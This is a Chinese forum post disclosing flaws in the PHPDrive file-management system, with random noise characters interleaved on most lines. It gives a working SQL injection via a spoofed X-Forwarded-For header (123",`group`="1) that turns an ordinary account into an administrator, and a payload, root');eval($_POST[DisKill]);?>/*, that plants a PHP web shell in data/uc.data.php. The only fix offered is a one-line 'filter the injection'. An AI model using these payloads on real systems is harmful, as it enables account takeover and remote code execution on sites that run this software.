PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等
2 f' O" o6 H+ C' k) d) M; u% Z O' ~$ {7 ^/ }) g: \2 Y
includes/user.lib.php% g. N" B, v: y9 b% X( ?, Q
行87. g* f$ p4 `3 x4 X
function get_ip() {, C& c! M, o, N5 c5 l7 j& h. q9 m% q
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.+ ~7 u( \) e7 S' E9 U; |: h' ~" g
在用户注册与登录 处module/disk/account.lead.php
# ?) Y* }0 y) R4 j% b198行 ! ]7 @/ T9 I( e
//更新本次登录IP和时间: `# @8 o! i' N8 E4 u
$db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生
- L/ o0 v! O. e3 r/ z( n; m6 U由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限
9 l! ^# I3 k$ \* G+ Y0 k6 j实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.; G+ O/ \/ i( R) }+ T# M; l
后台getshell:( x: f, {3 R) s: b2 e: V
在UCenter设置处,将UC数据库登录名填写为
4 W# X j6 }& u! h 2 d% X* V, ^8 [- ?& K. g
root’);eval($_POST[DisKill]);?>/*/ q. {" M2 A$ {. m5 v+ A
可以得到一个shell,位置在 data/uc.data.php
5 g' u- j6 k( ?5 j) R5 X: i: V4 N9 l1 D) j7 [
修复:过滤注入, ^) S$ w% ]& w9 j" G2 r
5 A- }8 }! y5 K/ L0 j6 `6 z
|
发表于 2012-12-31 09:18:34
收藏
支持
反对